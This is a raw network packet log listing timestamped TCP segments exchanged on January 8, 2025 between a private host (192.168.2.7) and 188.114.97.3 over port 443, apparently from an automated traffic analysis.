                                                      Jan 8, 2025 13:55:12.230933905 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.230952024 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.231309891 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.231329918 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.231456995 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.231472015 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.276669025 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.285651922 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.285661936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.285902977 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.285919905 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.286001921 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.286597967 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.286617041 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.286798000 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.286825895 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.286832094 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.286844969 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.286859989 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.286962986 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.287605047 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.287623882 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.287763119 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.287772894 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.288142920 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.288163900 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.288239956 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.288239956 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.288249016 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.293771982 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.293786049 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.293898106 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.293898106 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.293908119 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.323949099 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.323968887 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.324038982 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.324048996 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.324099064 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.370497942 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.377573013 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.377589941 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.377664089 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.377676964 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.377774000 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.378367901 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.378387928 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.378499031 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.378506899 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.378586054 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.379036903 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.379051924 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.379136086 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.379136086 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.379144907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.379246950 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.379822969 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.379838943 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.379972935 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.380009890 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.380014896 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.380028963 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.380053043 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.380105972 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.380599976 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.380615950 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.380763054 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.380775928 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.385565042 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.385581970 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.385648966 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.385658979 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.415788889 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.415806055 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.415926933 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.415926933 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.415945053 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.464150906 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.470027924 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.470046043 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.470211983 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.470222950 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.470309973 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.470479012 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.470495939 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.470618010 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.470626116 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.470787048 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.470964909 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.470982075 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.471071005 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.471079111 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.471184969 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.471353054 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.471369028 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.471441984 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.471448898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.471535921 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.471782923 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.471797943 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.471856117 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.471863031 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.471955061 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.472160101 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.472176075 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.472317934 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.472323895 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.472393990 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.477538109 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.477554083 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.477638006 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.477648020 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.477732897 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.508404970 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.508423090 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.508603096 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.508614063 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.508691072 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.562819004 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.562835932 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.562908888 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.562942982 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.562958002 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.562977076 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.562992096 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.563024998 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.563450098 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.563463926 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.563618898 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.563631058 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564050913 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564071894 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564183950 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.564193010 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564212084 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564225912 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564311981 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.564321041 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564474106 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564491987 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.564579010 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.564589024 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.600637913 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.600651979 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.600841999 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.600862026 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.601089954 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.601109028 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.601195097 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.601196051 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.601206064 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.651618958 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.655052900 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.655069113 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.655160904 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.655168056 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.655378103 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.655493975 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.655508995 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.655566931 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.655575037 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.655672073 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.655916929 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.655930042 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.656007051 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.656007051 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.656016111 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.656133890 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.656272888 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.656290054 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.656352043 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.656358957 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.656475067 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.656847000 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.656862974 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.656955004 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.656961918 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.656974077 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.657006025 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.657004118 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.657031059 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.657048941 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.657373905 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.695611954 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.695637941 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.695734978 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.695756912 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.695806980 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.695806980 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.695884943 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.695908070 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.695946932 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.695955038 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.695979118 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.696029902 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.747591019 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.747613907 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.747726917 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.747735977 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.747811079 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.747909069 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.747927904 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.747997046 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.748006105 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.748094082 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.748461008 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.748481989 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.748577118 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.748577118 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.748585939 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.748755932 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.748778105 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.748797894 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.748809099 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.748852015 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.748889923 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.749238014 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.749258995 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.749336958 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.749336958 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.749347925 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.749423027 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.749639034 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.749655008 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.749733925 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.749733925 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.749742985 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.749798059 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.788081884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.788100958 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.788245916 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.788264990 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.788343906 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.788357973 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.788374901 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.788433075 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.788440943 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.788470984 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.788499117 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.840626001 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.840647936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.840711117 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.840749025 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.840749025 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.840759993 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.840792894 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.840898991 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.840900898 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.840913057 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.840950012 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.840993881 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.841001987 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.841032028 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.841311932 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.841331005 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.841422081 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.841422081 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.841430902 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.841763020 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.841778040 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.841839075 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.841849089 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.841878891 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.842173100 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.842200041 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.842242956 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.842251062 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.842281103 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.881736040 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.881808996 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.881854057 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.881871939 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.881894112 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.881915092 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.881927013 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.881980896 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.881980896 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.932883978 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.932902098 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933269978 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.933290005 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933303118 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933334112 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933378935 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.933378935 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.933388948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933440924 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.933440924 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.933686018 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933701038 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933778048 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.933784962 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933830023 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.933922052 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.933932066 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.933947086 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.934019089 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.934026003 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.934124947 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.934284925 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.934298992 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.934381962 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.934390068 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.934623003 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.934640884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.934704065 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.934716940 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.934729099 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.934772968 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.973088026 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.973104000 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.973282099 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.973290920 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.973611116 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.973627090 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.973644972 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.973653078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:12.973663092 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:12.973925114 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.025362968 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.025373936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.025567055 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.025579929 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.025651932 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.025777102 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.025809050 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.025881052 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.025888920 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.025943041 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.025973082 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.025993109 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.026103973 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.026110888 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.026267052 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.026525974 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.026541948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.026655912 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.026655912 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:13.026663065 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:13.026806116 CET44349706188.114.97.3192.168.2.7
